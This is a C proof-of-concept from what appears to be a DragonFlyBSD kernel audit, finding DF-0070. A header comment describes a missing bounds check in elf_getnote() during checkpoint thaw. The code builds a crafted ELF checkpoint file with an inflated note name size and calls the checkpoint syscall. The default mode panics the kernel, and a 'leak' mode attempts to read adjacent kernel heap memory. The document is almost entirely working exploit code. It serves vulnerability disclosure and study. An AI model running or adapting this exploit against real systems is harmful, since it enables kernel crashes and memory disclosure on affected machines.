DragonFlyBSD Kernel Audit
DF-0070 / df0070.c
← back to finding ↓ download raw
/*
 * DF-0070 PoC -- elf_getnote heap OOB read via crafted ELF checkpoint image.
 *
 * Verified against the audited DragonFlyBSD master DEV kernel
 * (6.5-DEVELOPMENT, X86_64_GENERIC, build of 2026-06-29).  All sizes below
 * are printed at runtime by matching <sys/procfs.h> / <machine/reg.h>:
 *
 *     sizeof(prpsinfo_t)   = 120
 *     sizeof(prstatus_t)   = 248
 *     sizeof(prfpregset_t) = 512
 *     sizeof(gregset_t)    = 200   (struct reg)
 *     sizeof(fpregset_t)   = 512   (struct fpreg)
 *     sizeof(Elf_Note)     = 12
 *     sizeof(Elf64_Ehdr)   = 64
 *     sizeof(Elf64_Phdr)   = 56
 *
 * BUG: sys/kern/kern_checkpoint.c:313-352 elf_getnote()
 *   bcopy((char *)src + *off, &note, sizeof note);     // :325
 *   *off += sizeof note;                                // :329
 *   strncmp(name, src + *off, note.n_namesz);           // :335  (stops at NUL)
 *   *off += roundup2(note.n_namesz, sizeof(Elf_Size));  // :339  *** NO BOUNDS CHECK ***
 *   if (note.n_descsz != descsz) return EINVAL;         // :340
 *   bcopy(src + *off, *desc, note.n_descsz);            // :346  *** OOB READ ***
 *
 * notesz flows from phdr[0].p_filesz (kern_checkpoint.c:240, attacker-controlled)
 * and the kernel kmalloc()s exactly `notesz` bytes for `note` (:194).  nthreads
 * is derived purely from notesz (:185) ignoring per-note Elf_Note header +
 * name/desc padding overhead:
 *
 *     nthreads = (notesz - 120) / 760        (on amd64 master)
 *
 * We pick notesz = 880  =>  nthreads = 1  (passes the [1, CKPT_MAXTHREADS=256]
 * gate at :188).  The buffer is then only 880 bytes, but the first note's
 * n_namesz is set to a huge value (default 0x10000000).  strncmp still matches
 * "CORE\0" inside 5 bytes regardless of n_namesz, then *off jumps to
 * sizeof(Elf_Note)+roundup2(n_namesz,8) = 12 + 0x10000000 = 0x1000000c -- way
 * past the 880-byte buffer.  The bcopy at :346 then reads 120 bytes
 * (sizeof(prpsinfo_t)) from src + 0x1000000c, far outside any slab page, which
 * crosses an unmapped page in KVM and panics the kernel.
 *
 * Trigger:  sys_checkpoint(CKPT_THAW, fd, -1, 0)   (syscall #467).
 *           Default ckptgroup=0 => wheel-only; run as root.
 *
 * Build:    cc -o df0070 df0070.c
 * Run:      ./df0070 [evil.ckpt]            # builds file + triggers syscall
 *           ./df0070 [evil.ckpt] leak       # smaller OOB (slab-adjacent) to
 *                                            #   attempt info-leak instead of panic
 *
 * Expected (panic mode, default):  guest kernel panics with
 *           "Fatal trap 12: page fault while in kernel mode"
 *           at elf_getnote+0x.. in bcopy from src+0x1000000c.
 *
 * Expected (leak mode):  syscall returns silently (or EINVAL after
 *           elf_loadnotes rejects the leaked pr_statussz), but 120 bytes of
 *           uninitialized heap were copied into the prpsinfo buffer; if the
 *           pr_version/pr_psinfosz garbage happens to satisfy the version
 *           checks, pr_fname leaks into p_comm via strlcpy at :306.
 */

#include <sys/types.h>
#include <sys/param.h>
#include <sys/syscall.h>
#include <sys/elf_common.h>
#include <sys/elf64.h>
#include <sys/checkpoint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>

/* amd64 master DEV sizes (verified on the running kernel via probe.c). */
#define PRPSINFO_SZ    120
#define PRSTATUS_SZ    248
#define PRFPREGSET_SZ  512
#define ELF_NOTE_SZ    12
#define ELF64_EHDR_SZ  64
#define ELF64_PHDR_SZ  56
#define ELF_WORDSZ     8              /* sizeof(Elf_Size) on amd64 */

/* notesz so nthreads = (880-120)/760 = 1, in [1,256]. */
#define NOTESZ         (PRPSINFO_SZ + PRSTATUS_SZ + PRFPREGSET_SZ)   /* 880 */

#ifndef SYS_checkpoint
#define SYS_checkpoint 467
#endif

static void put32(unsigned char *p, uint32_t v) { p[0]=v; p[1]=v>>8; p[2]=v>>16; p[3]=v>>24; }
static void put64(unsigned char *p, uint64_t v) { for (int i=0;i<8;i++) p[i]=(uint8_t)(v>>(8*i)); }
static void put16(unsigned char *p, uint16_t v) { p[0]=v; p[1]=v>>8; }

/*
 * Build a minimal valid amd64 ELF (ET_CORE, EM_X86_64) with a single PT_NOTE
 * segment whose payload is `notesz` bytes long.  The first Elf_Note inside
 * that segment has the attacker-inflated n_namesz and the kernel-matching
 * n_descsz (= PRPSINFO_SZ for the NT_PRPSINFO entry that elf_demarshalnotes
 * parses first).
 *
 * The actual file payload after the headers is notesz bytes (mostly zero pad
 * so read_check() in elf_getnotes reads exactly notesz bytes successfully).
 * The name field is "CORE\0" + zero padding.
 */
static int
build_crafted_ckpt(const char *path, uint32_t namesz_mode, uint32_t descsz)
{
    unsigned char ehdr[ELF64_EHDR_SZ];
    unsigned char phdr[ELF64_PHDR_SZ];
    unsigned char note[ELF_NOTE_SZ];
    int fd;
    off_t off;

    fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) { perror("open"); return -1; }

    /* --- Elf64_Ehdr --- */
    memset(ehdr, 0, sizeof ehdr);
    ehdr[0]=0x7f; ehdr[1]='E'; ehdr[2]='L'; ehdr[3]='F';     /* e_ident[EI_MAG0..3] */
    ehdr[4]=ELFCLASS64;                                        /* EI_CLASS  */
    ehdr[5]=ELFDATA2LSB;                                       /* EI_DATA   */
    ehdr[6]=EV_CURRENT;                                        /* EI_VERSION */
    ehdr[7]=ELFOSABI_NONE;                                     /* EI_OSABI  */
    /* ehdr[8] EI_ABIVERSION = 0 */
    put16(ehdr+16, ET_CORE);                                   /* e_type    */
    put16(ehdr+18, EM_X86_64);                                 /* e_machine */
    put32(ehdr+20, EV_CURRENT);                                /* e_version */
    put64(ehdr+24, 0);                                         /* e_entry */
    put64(ehdr+32, 0);                                         /* e_phoff (set below) */
    put64(ehdr+40, 0);                                         /* e_shoff */
    put32(ehdr+48, 0);                                         /* e_flags */
    put16(ehdr+52, ELF64_EHDR_SZ);                             /* e_ehsize   -- validated by elf_gethdr */
    put16(ehdr+54, ELF64_PHDR_SZ);                             /* e_phentsize -- validated by elf_gethdr */
    put16(ehdr+56, 1);                                         /* e_phnum */
    put16(ehdr+58, 0);                                         /* e_shentsize */
    put16(ehdr+60, 0);                                         /* e_shnum */
    put16(ehdr+62, 0);                                         /* e_shstrndx */
    put64(ehdr+32, (uint64_t)ELF64_EHDR_SZ);                   /* e_phoff right after ehdr */

    /* --- Elf64_Phdr (single PT_NOTE) --- */
    memset(phdr, 0, sizeof phdr);
    put32(phdr+0,  PT_NOTE);                                   /* p_type   */
    put32(phdr+4,  PF_R);                                      /* p_flags  */
    put64(phdr+8,  (uint64_t)(ELF64_EHDR_SZ + ELF64_PHDR_SZ)); /* p_offset */
    put64(phdr+16, 0);                                         /* p_vaddr  */
    put64(phdr+24, 0);                                         /* p_paddr  */
    put64(phdr+32, (uint64_t)NOTESZ);                          /* p_filesz -- attacker controlled */
    put64(phdr+40, (uint64_t)NOTESZ);                          /* p_memsz  */
    put64(phdr+48, 0);                                         /* p_align  */

    /* --- First Elf_Note in the PT_NOTE payload --- */
    memset(note, 0, sizeof note);
    put32(note+0, namesz_mode);                                /* n_namesz -- the bug */
    put32(note+4, descsz);                                     /* n_descsz -- must equal descsz at :340 */
    put32(note+8, NT_PRPSINFO);                                /* n_type   = 3 */

    write(fd, ehdr, sizeof ehdr);
    write(fd, phdr, sizeof phdr);
    write(fd, note, sizeof note);

    /* Name field: "CORE\0" + zero pad to ELF_WORDSZ boundary. */
    unsigned char namepad[8] = { 'C','O','R','E',0,0,0,0 };
    write(fd, namepad, sizeof namepad);

    /* Pad the file out so read_check(fp, note, NOTESZ) succeeds. */
    off = lseek(fd, 0, SEEK_CUR);
    off_t end = (off_t)(ELF64_EHDR_SZ + ELF64_PHDR_SZ) + NOTESZ;
    if (off < end) {
        unsigned char z[4096];
        memset(z, 0, sizeof z);
        while (off < end) {
            size_t chunk = (size_t)((end - off > (off_t)sizeof z) ? sizeof z : (end - off));
            write(fd, z, chunk);
            off += (off_t)chunk;
        }
    }
    close(fd);
    return 0;
}

int
main(int argc, char **argv)
{
    const char *path = (argc > 1) ? argv[1] : "evil.ckpt";
    int leak_mode = (argc > 2 && strcmp(argv[2], "leak") == 0);

    /*
     * Panic mode (default): n_namesz=0x10000000 -> *off jumps 256 MB past the
     *   880-byte note buffer; bcopy at :346 reads from KVM that is unmapped
     *   beyond the heap -> fatal trap 12 page fault.
     *
     * Leak mode: n_namesz = NOTESZ - ELF_NOTE_SZ - ELF_WORDSZ
     *   = 880 - 12 - 8 = 860.  roundup2(860,8)=864.  After first elf_getnote
     *   *off = 12 + 864 = 876, then bcopy reads 120 bytes from src+876 -- a
     *   116-byte slab-adjacent OOB read.  Likely no panic (same slab page),
     *   leaked bytes go into prpsinfo buffer.
     */
    uint32_t namesz = leak_mode
        ? (uint32_t)(NOTESZ - ELF_NOTE_SZ - ELF_WORDSZ)
        : 0x10000000u;
    uint32_t descsz = PRPSINFO_SZ;   /* must equal sizeof(prpsinfo_t) */

    fprintf(stderr,
        "[*] DF-0070 PoC: building %s  (notesz=%d, n_namesz=0x%x, n_descsz=%u, mode=%s)\n",
        path, NOTESZ, namesz, descsz, leak_mode ? "leak" : "panic");

    if (build_crafted_ckpt(path, namesz, descsz) < 0)
        return 2;

    /* Open the file and trigger sys_checkpoint(CKPT_THAW, fd, -1, 0). */
    int fd = open(path, O_RDONLY);
    if (fd < 0) { perror("openckpt"); return 2; }
    fprintf(stderr,
        "[*] calling sys_checkpoint(CKPT_THAW, fd=%d, pid=-1, retval=0) [syscall #%d]...\n",
        fd, SYS_checkpoint);
    fflush(stderr);

    long rc = syscall(SYS_checkpoint, CKPT_THAW, fd, (pid_t)-1, 0);
    int saved = errno;
    fprintf(stderr,
        "[!] sys_checkpoint returned %ld, errno=%d (%s)\n",
        rc, saved, strerror(saved));

    /* If we get here, the kernel did NOT panic.  Dump whatever info we can. */
    if (rc == 0) {
        fprintf(stderr, "[!] THAW apparently succeeded -- examining p_comm via ps:\n");
        fflush(stderr);
        system("ps -o pid,comm,command -p $$");
    }
    close(fd);
    return (rc == 0) ? 0 : 1;
}